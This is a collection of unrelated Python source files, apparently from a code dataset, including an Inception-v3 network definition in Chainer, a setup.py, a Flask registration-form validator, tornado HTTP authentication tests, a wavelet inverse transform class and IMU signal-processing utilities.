('conv', L.Convolution2D(192, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(64, 96, 3, stride=1, pad=1)),
('bn_conv_1', L.BatchNormalization(96)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(96, 96, 3, stride=1, pad=1)),
('bn_conv_2', L.BatchNormalization(96)),
('_relu_2', ReLU())
])),
('tower_2', Tower([
('_pooling', AveragePooling2D(3,1,pad=1)),
('conv', L.Convolution2D(192, 32, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(32)),
('_relu', ReLU())
]))
]),
mixed_1=Mixed([
('conv', Tower([
('conv', L.Convolution2D(256, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU())
])),
('tower', Tower([
('conv', L.Convolution2D(256, 48, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(48)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(48, 64, 5, stride=1, pad=2)),
('bn_conv_1', L.BatchNormalization(64)),
('_relu_1', ReLU())
])),
('tower_1', Tower([
('conv', L.Convolution2D(256, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(64, 96, 3, stride=1, pad=1)),
('bn_conv_1', L.BatchNormalization(96)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(96, 96, 3, stride=1, pad=1)),
('bn_conv_2', L.BatchNormalization(96)),
('_relu_2', ReLU())
])),
('tower_2', Tower([
('_pooling', AveragePooling2D(3,1,pad=1)),
('conv', L.Convolution2D(256, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU())
]))
]),
mixed_2=Mixed([
('conv', Tower([
('conv', L.Convolution2D(288, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU())
])),
('tower', Tower([
('conv', L.Convolution2D(288, 48, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(48)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(48, 64, 5, stride=1, pad=2)),
('bn_conv_1', L.BatchNormalization(64)),
('_relu_1', ReLU())
])),
('tower_1', Tower([
('conv', L.Convolution2D(288, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(64, 96, 3, stride=1, pad=1)),
('bn_conv_1', L.BatchNormalization(96)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(96, 96, 3, stride=1, pad=1)),
('bn_conv_2', L.BatchNormalization(96)),
('_relu_2', ReLU())
])),
('tower_2', Tower([
('_pooling', AveragePooling2D(3,1,pad=1)),
('conv', L.Convolution2D(288, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU())
]))
]),
mixed_3=Mixed([
('conv', Tower([
('conv', L.Convolution2D(288, 384, 3, stride=2, pad=0)),
('bn_conv', L.BatchNormalization(384)),
('_relu', ReLU())
])),
('tower', Tower([
('conv', L.Convolution2D(288, 64, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(64)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(64, 96, 3, stride=1, pad=1)),
('bn_conv_1', L.BatchNormalization(96)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(96, 96, 3, stride=2, pad=0)),
('bn_conv_2', L.BatchNormalization(96)),
('_relu_2', ReLU())
])),
('pool', Tower([
('_pooling', MaxPooling2D(3, 2, pad=0))
]))
]),
mixed_4=Mixed([
('conv', Tower([
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
])),
('tower', Tower([
('conv', L.Convolution2D(768, 128, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(128)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(128, 128, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_1', L.BatchNormalization(128)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(128, 192, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_2', L.BatchNormalization(192)),
('_relu_2', ReLU())
])),
('tower_1', Tower([
('conv', L.Convolution2D(768, 128, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(128)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(128, 128, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_1', L.BatchNormalization(128)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(128, 128, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_2', L.BatchNormalization(128)),
('_relu_2', ReLU()),
('conv_3', L.Convolution2D(128, 128, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_3', L.BatchNormalization(128)),
('_relu_3', ReLU()),
('conv_4', L.Convolution2D(128, 192, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_4', L.BatchNormalization(192)),
('_relu_4', ReLU())
])),
('tower_2', Tower([
('_pooling', AveragePooling2D(3,1,pad=1)),
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
]))
]),
mixed_5=Mixed([
('conv', Tower([
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
])),
('tower', Tower([
('conv', L.Convolution2D(768, 160, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(160)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(160, 160, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_1', L.BatchNormalization(160)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(160, 192, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_2', L.BatchNormalization(192)),
('_relu_2', ReLU())
])),
('tower_1', Tower([
('conv', L.Convolution2D(768, 160, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(160)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(160, 160, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_1', L.BatchNormalization(160)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(160, 160, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_2', L.BatchNormalization(160)),
('_relu_2', ReLU()),
('conv_3', L.Convolution2D(160, 160, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_3', L.BatchNormalization(160)),
('_relu_3', ReLU()),
('conv_4', L.Convolution2D(160, 192, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_4', L.BatchNormalization(192)),
('_relu_4', ReLU())
])),
('tower_2', Tower([
('_pooling', AveragePooling2D(3,1,pad=1)),
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
]))
]),
mixed_6=Mixed([
('conv', Tower([
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
])),
('tower', Tower([
('conv', L.Convolution2D(768, 160, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(160)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(160, 160, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_1', L.BatchNormalization(160)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(160, 192, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_2', L.BatchNormalization(192)),
('_relu_2', ReLU())
])),
('tower_1', Tower([
('conv', L.Convolution2D(768, 160, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(160)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(160, 160, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_1', L.BatchNormalization(160)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(160, 160, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_2', L.BatchNormalization(160)),
('_relu_2', ReLU()),
('conv_3', L.Convolution2D(160, 160, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_3', L.BatchNormalization(160)),
('_relu_3', ReLU()),
('conv_4', L.Convolution2D(160, 192, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_4', L.BatchNormalization(192)),
('_relu_4', ReLU())
])),
('tower_2', Tower([
('_pooling', AveragePooling2D(3,1,pad=1)),
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
]))
]),
mixed_7=Mixed([
('conv', Tower([
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
])),
('tower', Tower([
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(192, 192, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_1', L.BatchNormalization(192)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(192, 192, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_2', L.BatchNormalization(192)),
('_relu_2', ReLU())
])),
('tower_1', Tower([
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(192, 192, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_1', L.BatchNormalization(192)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(192, 192, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_2', L.BatchNormalization(192)),
('_relu_2', ReLU()),
('conv_3', L.Convolution2D(192, 192, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_3', L.BatchNormalization(192)),
('_relu_3', ReLU()),
('conv_4', L.Convolution2D(192, 192, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_4', L.BatchNormalization(192)),
('_relu_4', ReLU())
])),
('tower_2', Tower([
('_pooling', AveragePooling2D(3,1,pad=1)),
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
]))
]),
mixed_8=Mixed([
('tower', Tower([
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(192, 320, 3, stride=2, pad=0)),
('bn_conv_1', L.BatchNormalization(320)),
('_relu_1', ReLU())
])),
('tower_1', Tower([
('conv', L.Convolution2D(768, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(192, 192, (1, 7), stride=1, pad=(0, 3))),
('bn_conv_1', L.BatchNormalization(192)),
('_relu_1', ReLU()),
('conv_2', L.Convolution2D(192, 192, (7, 1), stride=1, pad=(3, 0))),
('bn_conv_2', L.BatchNormalization(192)),
('_relu_2', ReLU()),
('conv_3', L.Convolution2D(192, 192, 3, stride=2, pad=0)),
('bn_conv_3', L.BatchNormalization(192)),
('_relu_3', ReLU())
])),
('pool', Tower([
('_pooling', MaxPooling2D(3, 2, pad=0))
]))
]),
mixed_9=Mixed([
('conv', Tower([
('conv', L.Convolution2D(1280, 320, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(320)),
('_relu', ReLU()),
])),
('tower', Tower([
('conv', L.Convolution2D(1280, 384, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(384)),
('_relu', ReLU()),
('mixed', Mixed([
('conv', Tower([
('conv', L.Convolution2D(384, 384, (1, 3), stride=1, pad=(0, 1))),
('bn_conv', L.BatchNormalization(384)),
('_relu', ReLU()),
])),
('conv_1', Tower([
('conv_1', L.Convolution2D(384, 384, (3, 1), stride=1, pad=(1, 0))),
('bn_conv_1', L.BatchNormalization(384)),
('_relu_1', ReLU()),
]))
]))
])),
('tower_1', Tower([
('conv', L.Convolution2D(1280, 448, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(448)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(448, 384, 3, stride=1, pad=1)),
('bn_conv_1', L.BatchNormalization(384)),
('_relu_1', ReLU()),
('mixed', Mixed([
('conv', Tower([
('conv', L.Convolution2D(384, 384, (1, 3), stride=1, pad=(0, 1))),
('bn_conv', L.BatchNormalization(384)),
('_relu', ReLU()),
])),
('conv_1', Tower([
('conv_1', L.Convolution2D(384, 384, (3, 1), stride=1, pad=(1, 0))),
('bn_conv_1', L.BatchNormalization(384)),
('_relu_1', ReLU()),
]))
]))
])),
('tower_2', Tower([
('_pooling', AveragePooling2D(3,1,pad=1)),
('conv', L.Convolution2D(1280, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
]))
]),
mixed_10=Mixed([
('conv', Tower([
('conv', L.Convolution2D(2048, 320, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(320)),
('_relu', ReLU()),
])),
('tower', Tower([
('conv', L.Convolution2D(2048, 384, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(384)),
('_relu', ReLU()),
('mixed', Mixed([
('conv', Tower([
('conv', L.Convolution2D(384, 384, (1, 3), stride=1, pad=(0, 1))),
('bn_conv', L.BatchNormalization(384)),
('_relu', ReLU()),
])),
('conv_1', Tower([
('conv_1', L.Convolution2D(384, 384, (3, 1), stride=1, pad=(1, 0))),
('bn_conv_1', L.BatchNormalization(384)),
('_relu_1', ReLU()),
]))
]))
])),
('tower_1', Tower([
('conv', L.Convolution2D(2048, 448, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(448)),
('_relu', ReLU()),
('conv_1', L.Convolution2D(448, 384, 3, stride=1, pad=1)),
('bn_conv_1', L.BatchNormalization(384)),
('_relu_1', ReLU()),
('mixed', Mixed([
('conv', Tower([
('conv', L.Convolution2D(384, 384, (1, 3), stride=1, pad=(0, 1))),
('bn_conv', L.BatchNormalization(384)),
('_relu', ReLU())
])),
('conv_1', Tower([
('conv_1', L.Convolution2D(384, 384, (3, 1), stride=1, pad=(1, 0))),
('bn_conv_1', L.BatchNormalization(384)),
('_relu_1', ReLU())
]))
]))
])),
('tower_2', Tower([
('_pooling', MaxPooling2D(3, 1, pad=1)),
('conv', L.Convolution2D(2048, 192, 1, stride=1, pad=0)),
('bn_conv', L.BatchNormalization(192)),
('_relu', ReLU())
]))
]),
logit=L.Linear(2048, 1008)
)
def __call__(self, x, get_feature=False, scaled=False, resize=False):
"""Input dims are (batch_size, 3, 299, 299)."""
if resize:
x = F.resize_images(x, (299, 299))
if scaled:
x = (x+1)*127.5
# assert x.shape[1:] == (3, 299, 299)
x -= 128.0
x *= 0.0078125
h = F.relu(self.bn_conv(self.conv(x)))
# assert h.shape[1:] == (32, 149, 149)
h = F.relu(self.bn_conv_1(self.conv_1(h)))
# assert h.shape[1:] == (32, 147, 147)
h = F.relu(self.bn_conv_2(self.conv_2(h)))
# assert h.shape[1:] == (64, 147, 147)
h = F.max_pooling_2d(h, 3, stride=2, pad=0)
# assert h.shape[1:] == (64, 73, 73)
h = F.relu(self.bn_conv_3(self.conv_3(h)))
# assert h.shape[1:] == (80, 73, 73)
h = F.relu(self.bn_conv_4(self.conv_4(h)))
# assert h.shape[1:] == (192, 71, 71)
h = F.max_pooling_2d(h, 3, stride=2, pad=0)
# assert h.shape[1:] == (192, 35, 35)
h = self.mixed(h)
# assert h.shape[1:] == (256, 35, 35)
h = self.mixed_1(h)
# assert h.shape[1:] == (288, 35, 35)
h = self.mixed_2(h)
# assert h.shape[1:] == (288, 35, 35)
h = self.mixed_3(h)
# assert h.shape[1:] == (768, 17, 17)
h = self.mixed_4(h)
# assert h.shape[1:] == (768, 17, 17)
h = self.mixed_5(h)
# assert h.shape[1:] == (768, 17, 17)
h = self.mixed_6(h)
# assert h.shape[1:] == (768, 17, 17)
h = self.mixed_7(h)
# assert h.shape[1:] == (768, 17, 17)
h = self.mixed_8(h)
# assert h.shape[1:] == (1280, 8, 8)
h = self.mixed_9(h)
# assert h.shape[1:] == (2048, 8, 8)
h = self.mixed_10(h)
# assert h.shape[1:] == (2048, 8, 8)
h = F.average_pooling_2d(h, 8, 1)
# assert h.shape[1:] == (2048, 1, 1)
h = F.reshape(h, (-1, 2048))
if get_feature:
return h
else:
h = self.logit(h)
h = F.softmax(h)
# assert h.shape[1:] == (1008,)
return h
|
StarcoderdataPython
|
4967967
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
__pkginfo__ = {}
with open("jinsi/__pkginfo__.py") as fh:
exec(fh.read(), __pkginfo__)
class Info:
version = __pkginfo__.get("version", None)
setuptools.setup(
name="jinsi",
version=Info.version,
author="<NAME>",
author_email="<EMAIL>",
description="JSON/YAML homoiconic templating language",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/scravy/jinsi",
scripts=[
"bin/jinsi"
],
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.7',
install_requires=[
'awesome-pattern-matching>=0.20.1',
'pyyaml>=5.0.0',
],
)
|
StarcoderdataPython
|
19039
|
<reponame>webguru001/Python-Django-Web<filename>Francisco_Trujillo/Assignments/registration/serverre.py
from flask import Flask, render_template, request, redirect, session, flash
import re
EMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
app = Flask(__name__)
app.secret_key = 'irtndvieurnviur'
@app.route('/')
def index():
return render_template("index.html")
#check all for empty and password >=8
def checkForValuelength(form):
if ((len(form['email']))< 1 or
(len(form['fname']))< 1 or
(len(form['lname']))< 1 or
(len(form['password']))<=8 or
(len(form['cpassword']))<= 8):
return False
return True
# check for valid name and last name
def validNamefileds(form):
if not form['fname'].isalpha() or not form['lname'].isalpha():
return False
return True
# invalid EMAIL
def matchPassword(form):
if not form['password'] == form['cpassword']:
return False
return True
@app.route('/process', methods=['POST'])
def form_page():
if not checkForValuelength(request.form):
flash("All fileds are required and password must be 8 or more characater")
return redirect('/')
elif not validNamefileds(request.form):
flash("Name and last name must not contain numbers")
return redirect('/')
elif not EMAIL_REGEX.match(request.form['email']):
flash("Invalid Email address")
return redirect('/')
elif not matchPassword(request.form):
flash("Password do not match")
return redirect ('/')
flash("Form sccessfully submitted")
return redirect('/')
@app.route('/')
def result_page():
return redirect('/')
app.run(debug=True)
|
StarcoderdataPython
|
5175794
|
<filename>2nd/generate_1m_numbers.py
# <NAME>,Tzu-Heng's Work
# generate a file with 1,000,000 numbers
# Mailto: <EMAIL>
# Github: github.com/lzhbrian
# Linkedin: linkedin/in/lzhbrian
import random
fp = open('./Numbers.txt','w')
length = 1000000
min_x = 0
max_x = 60000
count = 0
for x in xrange(0,length):
print >> fp, (random.uniform(min_x, max_x))
count += 1
print "Suc. print ", count, " numbers"
|
StarcoderdataPython
|
1658189
|
from typing import Callable
import numpy as np
from .Wavelet import Wavelet
from .WaveletHelper import inverse_transform
class AbstractWaveletInverseTransform(object):
def __init__(self,
wavelet: Wavelet):
self.wavelet = wavelet
def transform(self,
build_matrix: Callable[[int], np.array]) -> np.array:
work_image = self.wavelet.get()
height, width = work_image.shape
transform_h_matrix: np.array = build_matrix(width)
transform_v_matrix: np.array = build_matrix(height)
return inverse_transform(
input_image=work_image,
transform_h_matrix=transform_h_matrix,
transform_v_matrix=transform_v_matrix)
|
StarcoderdataPython
|
1732368
|
from base64 import b64encode
from tornado_http_auth import DigestAuthMixin, BasicAuthMixin, auth_required
from tornado.testing import AsyncHTTPTestCase
from tornado.web import Application, RequestHandler
credentials = {
'user1': '<PASSWORD>',
'user2': '<PASSWORD>',
}
class BasicAuthHandler(BasicAuthMixin, RequestHandler):
@auth_required(realm='Protected', auth_func=credentials.get)
def get(self):
self.write('Hello %s' % self._current_user)
class DigestAuthHandler(DigestAuthMixin, RequestHandler):
@auth_required(realm='Protected', auth_func=credentials.get)
def get(self):
self.write('Hello %s' % self._current_user)
class AuthTest(AsyncHTTPTestCase):
def get_app(self):
urls = [
('/digest', DigestAuthHandler),
('/basic', BasicAuthHandler),
]
return Application(urls, http_client=self.http_client)
def test_digest_auth(self):
res = self.fetch('/digest')
self.assertEqual(res.code, 401)
# TODO: Add digest authentication to HTTPClient in order to test this.
def test_basic_auth(self):
res = self.fetch('/basic')
self.assertEqual(res.code, 401)
auth = '%s:%s' % ('user1', '<PASSWORD>')
auth = b64encode(auth.encode('ascii'))
hdr = {'Authorization': 'Basic %s' % auth.decode('utf8')}
res = self.fetch('/basic', headers=hdr)
self.assertEqual(res.code, 200)
|
StarcoderdataPython
|
8184314
|
<gh_stars>0
import scipy
import matplotlib.pyplot as plt
import numpy as np
import ahrs
import pandas as pd
import scipy.signal as signal
import scipy.integrate as intg
from numpy import pi
from scipy.fftpack import fft, ifft, dct, idct, dst, idst, fftshift, fftfreq
from numpy import linspace, zeros, array, pi, sin, cos, exp, arange
import emd
#import ssqueezepy as sq
fs = 1660
dt = 1/fs
def prep_data(df, fs, fc, factor):
t = df.index.to_numpy()
if df.rot.max()>=300.0:
df['rot'] = np.deg2rad(df['rot'])
df.rot = np.unwrap(df.rot)
b,a = scipy.signal.cheby1(23, 0.175, fc, fs=fs)
S = scipy.signal.filtfilt(b, a, df, axis=0)
# S[:,2:] = freqfilt(S[:,2:], fs, fc)
ss, tt = scipy.signal.resample(S,factor*len(S), t=t, axis=0, window='hann')
# ss[:,0] = ss[:,0]%(2*np.pi)
# ss = ss[100:-100,:]
# tt = tt[100:-100]
FS = factor*fs
cma = np.array([-4.4019e-004 , 1.2908e-003, -1.9633e-002])
La = np.array([-8.3023e-019, -8.1e-002, -8.835e-002])
posa = La-cma
cmb = np.array([8.0563e-005, 5.983e-004, -6.8188e-003])
Lb = np.array([5.3302e-018, -7.233e-002, 3.12e-002+2.0e-003])
posb = Lb-cmb
A = imu2body(ss[:,2:8],tt, FS, posa)
B = imu2body(ss[:,8:], tt, FS, posb)
C = pd.DataFrame({'cur': ss[:,1],'rot': ss[:,0]},tt)
Q = [A, B, C]
for ii in range(len(Q)):
_q, _t = scipy.signal.resample(Q[ii], len(Q[ii])//factor, t=Q[ii].index, axis=0, window='hann')
Q[ii] = pd.DataFrame(_q,_t, columns=Q[ii].columns)
A, B, C = Q
C['rot'] = C['rot']%(2*np.pi)
return A, B, C, FS/factor
def freqfilt(data, fs, fc):
data[:,0] = np.unwrap(np.deg2rad(data[:,0]))
N = len(data)
ff = fftfreq(N,1/fs)
k = (abs(ff)<=fc).reshape((N,1))
Data = fft(data, axis=0)
Data.real = Data.real*k
# Data.real = Data.real*k
data_out = np.real(ifft(Data, axis=0))
data_out[:,0] = data_out[:,0]%(2*np.pi)
return data_out
def fix_outlier(_data):
_m = _data.mean()
peaks,_ = scipy.signal.find_peaks(abs(_data.flatten()),width=1, prominence=2, height=3*_m, distance=5)
for peak in peaks:
_f = scipy. interpolate.interp1d(np.array([0,9]), np.array([_data[peak-5],_data[peak+5]]).T, kind='linear')
_data[peak-5:peak+5] = _f(np.arange(0,10)).T
return _data
# def PSD(_data, fs):
# f, Pxx = scipy.signal.welch(_data, fs, nperseg=fs//4, noverlap=fs//8, window='hann', average='median', scaling='spectrum', detrend='linear', axis=0)
# plt.figure()
# plt.subplot(211)
# _t = np.linspace(0, len(_data)*dt, len(_data))
# plt.plot(_t, _data)
# plt.subplot(212)
# plt.semilogx(f, 20*np.log10(abs(Pxx)))
# plt.xlim((1,415))
# plt.grid()
def PSD(df, fs, units='unid.'):
f, Pxx = scipy.signal.welch(df, fs, nperseg=fs//4, noverlap=fs//8, window='hann', average='mean', scaling='density', detrend=False, axis=0)
plt.figure()
plt.subplot(211)
plt.title('Sinal')
plt.xlabel('Tempo [s]')
plt.ylabel('Amplitude [{}]'.format(units))
plt.plot(df)
plt.legend(df.columns)
plt.subplot(212)
plt.title('Densidade do Espectro de Potência')
plt.plot(f, 20*np.log10(abs(Pxx)))
plt.xlim((1,480))
plt.xlabel('Frequência [Hz]')
plt.ylabel('PSD [({})²/Hz]'.format(units))
# plt.legend(['Piezo', 'MEMS'])
plt.grid()
plt.tight_layout()
def FDI(data, factor=1, NFFT=fs//4):
n = NFFT
try:
width = data.shape[1]
except:
width = 0
_data = np.vstack((np.zeros((2*n,width)), data, np.zeros((2*n,width))))
N = len(_data)
w = scipy.signal.windows.hann(n).reshape((n,1))
Data = np.zeros_like(_data, dtype=complex)
for ii in range(0, N-n, n//2):
Y = _data[ii:ii+n,:]*w
k = (1j*2*np.pi*scipy.fft.fftfreq(len(Y), dt).reshape((n,1)))
y = (scipy.fft.ifft(np.vstack((np.zeros((factor,width)),scipy.fft.fft(Y, axis=0)[factor:]/(k[factor:]))), axis=0))
Data[ii:ii+n,:] += y
return np.real(Data[2*n:-2*n,:])
# def spect(df,fs, dbmin=80):
# plt.figure()
# if len(_data.shape)<2:
# _data = _data.reshape((len(_data),1))
# kk = _data.shape[1]
# for ii in range(kk):
# plt.subplot(kk*100+10+ii+1)
# f, t, Sxx = scipy.signal.spectrogram(_data[:,ii], fs=fs, axis=0, scaling='spectrum', nperseg=fs//4, noverlap=fs//8, detrend='linear', mode='psd', window='hann')
# Sxx[Sxx==0] = 10**(-20)
# plt.pcolormesh(t, f, 20*np.log10(abs(Sxx)), shading='auto', cmap=plt.inferno(),vmax=20*np.log10(abs(Sxx)).max(), vmin=20*np.log10(abs(Sxx)).max()-dbmin)
# plt.ylim((0, 300))
# plt.colorbar()
# plt.ylabel('Frequency [Hz]')
# plt.xlabel('Time [sec]')
# plt.tight_layout()
# plt.show()
def spect(df,fs, dbmin=80, print=True, freqlims=(1,480)):
for frame in df:
f, t, Sxx = scipy.signal.spectrogram(df[frame], fs=fs, axis=0, scaling='spectrum', nperseg=fs//2, noverlap=fs//4, detrend=False, mode='psd', window='hann')
Sxx[Sxx==0] = 10**(-20)
if print==True:
plt.figure()
plt.pcolormesh(t, f, 20*np.log10(abs(Sxx)), shading='gouraud', cmap='turbo',vmax=20*np.log10(abs(Sxx)).max(), vmin=20*np.log10(abs(Sxx)).max()-dbmin)
plt.ylim(freqlims)
plt.colorbar()
plt.title(frame)
plt.ylabel('Frequency [Hz]')
plt.xlabel('Time [sec]')
plt.tight_layout()
plt.show()
else:
return t, f, 20*np.log10(abs(Sxx))
def FDD(_data, factor=1, NFFT=fs):
N = len(_data)
try:
width = _data.shape[1]
except:
_data = _data.reshape((N,1))
width = 1
n = NFFT
w = signal.windows.hann(n).reshape((n,1))
Data = np.zeros_like(_data, dtype=complex)
for ii in range(0, N-n, n//2):
Y = _data[ii:ii+n,:]*w
k = (1j*2*pi*fftfreq(len(Y), dt).reshape((n,1)))
y = (ifft(np.vstack((np.zeros((factor,width)),fft(Y, axis=0)[factor:]*(k[factor:]))), axis=0))
Data[ii:ii+n,:] += y
return np.real(Data)
def TDI(_data):
N = len(_data)
if len(_data.shape)==1:
_data = _data.reshape((N,1))
_data = zmean(_data)
_dataout = np.zeros_like(_data)
_dataout[0,:] = _data[0,:]*dt/2
for ii in range(1,N):
_dataout[ii,:] = intg.simpson(_data[0:ii,:], dx=dt, axis=0)
return _dataout
def zmean(_data):
return np.real(ifft(np.vstack((np.zeros((2,_data.shape[1])),fft(_data, axis=0)[2:])), axis=0))
def imu2body(df, t, fs, pos=[0, 0, 0]):
gyr = df[:,0:3]
acc = df[:,3:]
grv = np.array([[0],[0],[-9.81]])
alpha = FDD(gyr)
accc = acc + np.cross(gyr,np.cross(gyr,pos)) + np.cross(alpha,pos)
q0=ahrs.Quaternion(ahrs.common.orientation.acc2q(accc[0]))
imu = ahrs.filters.Complementary(acc=accc, gyr=gyr, frequency=fs, q0=q0, gain=0.000001)
theta = ahrs.QuaternionArray(imu.Q).to_angles()
acccc = np.zeros_like(accc)
for ii in range(len(acc)):
acccc[ii,:] = accc[ii,:] + ahrs.Quaternion(imu.Q[ii]).rotate(grv).T
v = FDI(acccc)
d = FDI(v)
ah = {}
ah['Dx'] = d[:,0]
ah['Dy'] = d[:,1]
ah['Dz'] = d[:,2]
ah['Vx'] = v[:,0]
ah['Vy'] = v[:,1]
ah['Vz'] = v[:,2]
ah['Ax'] = acccc[:,0]
ah['Ay'] = acccc[:,1]
ah['Az'] = acccc[:,2]
ah['thx'] = theta[:,0]
ah['thy'] = theta[:,1]
ah['thz'] = theta[:,2]
ah['omx'] = gyr[:,0]
ah['omy'] = gyr[:,1]
ah['omz'] = gyr[:,2]
ah['alx'] = alpha[:,0]
ah['aly'] = alpha[:,1]
ah['alz'] = alpha[:,2]
dataFrame = pd.DataFrame(ah, t)
return dataFrame
def vizspect(tt, ff, Sxx, Title, xlims=None, ylims=None, fscale='linear'):
fig = plt.figure()
ax = fig.add_subplot(111)
plt.yscale(fscale)
spec = ax.imshow(Sxx, aspect='auto', cmap='turbo', extent=[tt[0], tt[-1], ff[0], ff[-1]])
plt.colorbar(spec)
ax.set_xlim(xlims)
ax.set_ylim(ylims)
ax.set_title(Title)
ax.set_xlabel('Time [s]')
ax.set_ylabel('Frequency [Hz]')
fig.show()
def apply_emd(df, fs):
t = df.index.to_numpy()
mfreqs = np.array([360,300,240,180,120,90,60,30,15,7.5])
for frame in df.columns:
S = df[frame].to_numpy()
imf, _ = emd.sift.mask_sift(S, mask_freqs=mfreqs/fs, mask_amp_mode='ratio_sig', ret_mask_freq=True, nphases=8, mask_amp=S.max())
Ip, If, Ia = emd.spectra.frequency_transform(imf, fs, 'nht')
emd.plotting.plot_imfs(imf,t, scale_y=True, cmap=True)
plt.suptitle('IMFs - {}'.format(frame))
emd.plotting.plot_imfs(Ia,t, scale_y=True, cmap=True)
